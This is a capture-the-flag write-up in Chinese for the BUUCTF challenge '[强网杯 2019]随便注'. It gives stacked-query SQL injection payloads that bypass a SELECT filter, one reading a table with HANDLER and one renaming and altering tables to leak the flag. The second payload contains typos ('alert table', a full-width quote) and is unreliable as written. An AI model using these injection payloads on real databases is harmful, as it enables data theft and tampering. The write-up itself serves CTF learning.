zoukankan      html  css  js  c++  java
  • BUUCTF-Web-[强网杯 2019]随便注-WriteUp

    1.老规矩:

    2.有一个过滤:

    3.使用堆叠查询,show tables:

    4.show columns from words:

    5.show columns from 1919810931114514(注意这个不是单引号):

    6.发现flag在1919810931114514这个表中,因为select被过滤了,所以我们想办法用其他方法把flag显示出来。

    • 方法一:handler
      handler table_name open; //打开表
      handler table_name read first; //读取数据
      payload:1';handler 1919810931114514 open;handler 1919810931114514 read first;#

      flag{ec54576f-4910-4c98-a60a-c91a2b0d322b}

    • 方法二:我们现在是在words这个表中,内部查询类似select id,data from words where id =,可以先将words这个表改成别的名字,id这个列名改为别的名字,再将1919810931114514改名为words,flag改名为id
      payload:
      1’;rename table words to words1;rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#

  • 相关阅读:
    java Metaspace频繁FGC问题定位(转载)
    JVM内存模型详解(转载)
    56. Merge Intervals
    begin again
    55. Jump Game
    54. Spiral Matrix
    53. Maximum Subarray
    52. N-Queens II
    51. N-Queens
    1. 赋值运算符函数
  • 原文地址:https://www.cnblogs.com/P201821430045/p/14677439.html
Copyright © 2011-2022 走看看